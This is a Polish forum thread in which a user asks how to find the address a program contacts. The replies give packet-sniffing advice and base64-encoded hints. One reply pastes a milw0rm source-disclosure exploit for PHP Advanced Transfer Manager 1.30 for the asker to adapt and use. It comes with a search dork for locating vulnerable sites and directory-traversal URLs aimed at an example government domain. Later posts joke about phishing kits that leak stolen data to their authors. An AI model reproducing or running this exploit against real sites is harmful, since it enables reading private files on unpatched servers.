Mam cos takiego.Tam gdzie jest zamazane jest adres tej strony z ktora laczy sie ten program.
http://img56.imageshack.us/my.php?image=screenyi8.jpg
Mam cos takiego.Tam gdzie jest zamazane jest adres tej strony z ktora laczy sie ten program.
http://img56.imageshack.us/my.php?image=screenyi8.jpg
Nikt nic nie opdposuje. Zakladam ze zrobiles cos zle i prosze was , czy moglby mi ktos wytlumaczyc krok po kroku, co trzeba zrobic , zeby zdobyc PELNY adres strony , z ktora dany plik chce sie polaczyc
A. Przeczytaj rfc HTTP, zwróć szczególną uwagę na REQEST i na nagłówek HOST, oraz ewentualny Concent i wypieki.
B. Przeczytaj manual WireShark'a
C. Podsłuchaj nieco ruchu.
D. Wyfiltruj zapytania HTTP
E. Przeczytaj pierwszy wiersz pola danych
F. Dowiedz się z nagłówka host, gdzie się połączyłeś
G. Upewnij się co do typu zapytania (POST/GET).
H. Znajdź pakiety z interesującymi Cię danymi.
I. Spróbuj zrobić filter, który będzie sam łapał interesujące Cię dane.
J. Ładnie podziękuj użytkownikom i administracji za pomoc.
K. Jeśli to rozwiąże twój problem, powiadom nas o tym, oraz dokładnie opisz jak doszedłeś do rozwiązania.
L. ... Nie mam pomysłu...
EDIT:Kod:UGFtaWV0YWNpZSBwZXduYSBtb2RlIGt0b3JhIHphcG9jemF0a293YWxlbT8KUG9kcG93aWVkeiB3 IHR5bSBrb2R6aWUsIHBpZXJ3c3phIGxpbmlhIHphcHl0YW5pYSBtb3dpIENpIGRvIGt0b3JlZ28g cGxpa3UgCm5hIHNlcndlcnplIGRvc3RhamUgc2llIHR3b2phIHByemVnbGFkYXJrYS4gTnAuCkdF VCAvd2lraS9pbmRleC5waHAgSFRUUC8xLjAKCk1vd2kgQ2kgemUgcHJ6ZWdsYWRhcmthIGRvc3Rh amUgc2llIGRvIHBsaWt1IG8gc2NpZXpjZSAiL3dpa2kvaW5kZXgucGhwIi4KVyB0eW0gd3lwYWRr dSBpbmRleC5waHAgbW96ZW15IG9taW5hYywgYWxlIGRvZGFsZW0gZ28gYnkgYnlsbyBsYXR3aWVq LgpOYWdsb3dlayBob3N0IG9rcmVzbGEgbmFqY3plc2NpZWogbmF6d2UgZG9tZW5vd2Egc2Vyd2Vy YSwgYnkgdGVuLCBvIGlsZSAKbWEgd2llbGUgc2Vyd2lzb3csIHdpZWR6aWFsIGt0b3J5IG1hIENp IGFrdHVhbG5pZSB6YXNlcndvd2FjLgpDaWFzdGthIHNhIGN6ZXN0byB3YXpuZSBkbyB1dHJ6eW1h bmlhIHNlc2ppLgpKZXNsaSB6YXB5dGFuaWUgamVzdCBQT1NUIHRvIG5pZSB3eXN0YXJjenkgemUg cHJ6ZWtvcGl1amVzeiBsaW5rIGkgd3J6dWNpc3ogCmRvIHByemVnbGFkYXJraSwgbXVzaXN6IGRv ZGF0a293byB3eXNsYWMgZGFuZSBQT1NUJ2EgYnkgb3RyenltYWMgemJsaXpvbmUgCmx1YiBuYXdl dCB0YWtpZSBzYW1lIHd5bmlraSBqYWsgcG9kc2x1Y2hhbnkuCgpQb3pkcmF3aWFtLApOaWtvd3Nr aS4K
Pogłówkuj (SAM!) nieco nad tymi kodami, a uzyskasz upragnioną odpowiedź.Kod:UFM6IEpha2J5cyBjaGNpYWwgd2llY2VqIGluZm8sIGx1YiBieXMgc29iaWUgZGFsZWogbmllIG1v Z2wgcG9yYWR6aWMsCnphcHJhc3phbSBuYSBJUkMuIFR5bGtvIG5pa29tdSBuaWUgbW93IHplIGpl c3RlbSBtaWx5LCBkbHVnbyBwcmFjb3dhbGVtCm5hIHJlcHV0YWNqZSBhcm9nYW5ja2llZ28gZHJh bmlhLCBrdG9yeSBiYXdpIHNpZSB1Y3p1Y2lhbWkgaW5ueWNoIAp0eWxrbyBkbGEgcm96cnl3a2ku Cg==
Ostatnio edytowane przez Nikow : 11-09-2008 - 14:47
http://nikowek.blogspot.com/
Zbrojne Ramię Pingwina!
-----BEGIN GEEK CODE BLOCK-----
Version: 3.12
GCS d- s++:++ a--- C+++ UL+++ P L+++ E--- W++ N++ o K- w--
O M- V- PS PE Y PGP++ t+ 5 X+ R tv- b++ DI- D-
G+ e- h! r% y?
------END GEEK CODE BLOCK------
Masz od wuja...
Przerób sobię i działaj...
<?
/*
::::::::: :::::::::: ::: ::: ::::::::::: :::
:+: :+: :+: :+: :+: :+: :+:
+:+ +:+ +:+ +:+ +:+ +:+ +:+
+#+ +:+ +#++:++# +#+ +:+ +#+ +#+
+#+ +#+ +#+ +#+ +#+ +#+ +#+
#+# #+# #+# #+#+#+# #+# #+#
######### ########## ### ########### ##########
::::::::::: :::::::::: ::: :::: ::::
:+: :+: :+: :+: +:+:+: :+:+:+
+:+ +:+ +:+ +:+ +:+ +:+:+ +:+
+#+ +#++:++# +#++:++#++: +#+ +:+ +#+
+#+ +#+ +#+ +#+ +#+ +#+
#+# #+# #+# #+# #+# #+#
### ########## ### ### ### ###
- - [DEVIL TEAM THE BEST POLISH TEAM] - -
Exploit Name: PHP Advanced Transfer Manager <= 1.30 Source Code Disclosure Exploit
Script Name: PHP Advanced Transfer Manager 1.30
Script Site: http://phpatm.free.fr/
dork: "Powered by PHP Advanced Transfer Manager v1.30"
Find by: Kacper (a.k.a Rahim)
========> DEVIL TEAM IRC: irc.milw0rm.com:6667 #devilteam <========
========> http://www.rahim.webd.pl/ <========
Contact: [email protected]
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Greetings DragonHeart and all DEVIL TEAM Patriots
- Leito & Leon | friend str0ke
Blund Coder, D0han, d3m0n, D3m0n , dn0d'e, DUREK5, fdj, Grzegorz, GrZyB997, konsol, Mandr4ke,
mass, michalind, mIvus, Nua, nukedclx, pepi, QunZ, Qw3rty, RebeL, SkD, Adam, arkadius, asteroid, blue, Ci2u, CrazzyIwan,
DMX, drzewko, ExTrEmE][-][ack, Gelo, Kicaj, Larry, Leito, LEON, Michas, Morpheus, MXZ, Ramzes, redsaq, TomZen
and
Dr Max Virus
TamTurk,
hackersecurity.org
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Greetings for 4ll Fusi0n Group members
and all members of hacker.com.pl
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
in folder users we dont find any file like: .htaccess so we can read all files
http://site.gov.pl/upload/users/Admin
Admin < username
or you can read all files in ftp
http://site.gov.pl/upload/viewers/ht...r=..&filename=[file]
http://site.gov.pl/upload/viewers/ht...r=..&filename=[file]
GAME OVER
*/
//Settings
$nick = "Admin";
$glowna = "http://site.com/path/";
$exploit = "1"; //$exploit = "0"; < exploit off
//End Settings
//************************************************** ************************************************** ************************************************
if ( $exploit == "1" ) {
$exp= "<title>PHP Advanced Transfer Manager <= 1.30 Source Code Disclosure Exploit :: DEVIL TEAM :: The Best Polish Team ::</title>"
."<style type=\"text/css\">"
."body {background-color: #000000;}"
."body,td,th {color: #FFFFFF;}"
.".name {font-size:11px;font-weight: bold}"
."</style><form method=\"get\" action=\"".$glowna."/users/".$nick."\">"
."<div align=\"center\"><img src=\"http://www.rahim.webd.pl/index_r2_c3.jpg\"></div>"
."<p align=\"center\">script url:<br>"
."<input type=\"text\" name=\"glowna\" size=\"90\" value=\"".$glowna."\">"
."<br>"
."Admin nick:<br>"
."<input name=\"nick\" type=\"text\" value=\"".$nick."\" size=\"90\"".$nick."\">"
."<br>"
."<input type=\"submit\" value=\"Exploit\" name=\"submit\">"
."</p>"
."<p align=\"center\">Find by: <a href=\"mailto:[email protected]\">Kacper</a> (a.k.a <a href=\"mailto:[email protected]\">Rahim</a>)<br>"
."<br>"
."DEVIL TEAM IRC: irc.milw0rm.com:6667 #devilteam<br>"
."<br>"
."Contact: <a href=\"mailto:[email protected]\">kacper1964@yah oo.pl</a><br>"
."or</p>"
."<p align=\"center\"> <a href=\"http://www.rahim.webd.pl\">http://www.rahim.webd.pl/</a></p>"
."<p align=\"center\" class=\"name\"> </p>"
."<HR WIDTH=\"650\" ALIGN=\"center\">"
."<p align=\"center\"> Z Dedykacja dla osoby,<br>"
."bez ktorej nie mogl bym zyc...<br>"
."K.C:* J.M (a.k.a Magaja)</p>"
."<p align=\"center\"> Special Greetz: DragonHeart ;-)<br>"
."Ema: Leito, Leon, Adam, DeathSpeed, Drzewko, pepi, mivus<br>"
."SkD, nukedclx, Ramzes<br>"
."<br>"
."Greetz for all users DEVIL TEAM IRC Channel !!<br>"
."!@ Przyjazni nie da sie zamienic na marne korzysci @!</p>"
."<HR WIDTH=\"650\" ALIGN=\"center\">"
."<p align=\"center\"> </p>"
."</form>";
print $exp;
}
?>
# milw0rm.com [2006-12-20]
Wklejam caly dla marudnych.Mam tylko na tyle czasu by to wklejic...
Stary ale jary
Chyba wiesz gdzie poczatek ?
A jak nie poradzisz wujek poradzi...
Przyda Ci sie ;> Chociaz na wzor
Ostatnio edytowane przez Mandr4ke : 11-09-2008 - 15:45
"Wszystkie komputery PC są kompatybilne, ale niektóre są kompatybilniejsze od innych... Twój jest zawsze mniej kompatybilny..."
Hehe Mandr4ke... a co by tak gdyby tak... tak jak z phish'em robia :-)
... czyli sprzedaja toolkit a w kodzie jest jak wol, ze kopia danych idzie do nich
ctrl-alt-del.cc - soft reset site for IT admins and other staff :-)
Autorowi tego śmiesznego "exploita" sugeruję, aby trochę poczytał o tym jak poprawnie programować w PHP.
milw0rm.com [2006-12-20].....Jego autor wtedy mial 14 lat...Wiec wydaje mi sie ze smieszne to nie jest...No moze dzisiaj
"Wszystkie komputery PC są kompatybilne, ale niektóre są kompatybilniejsze od innych... Twój jest zawsze mniej kompatybilny..."
No tak powinien był wykorzystać smarty i templatki
Może nam pokażesz elcef jak się powinno pisać exploity
@Egoalter
Przeczytaj jeszcze raz mojego poprzedniego posta. Tym razem postaraj się ze zrozumieniem.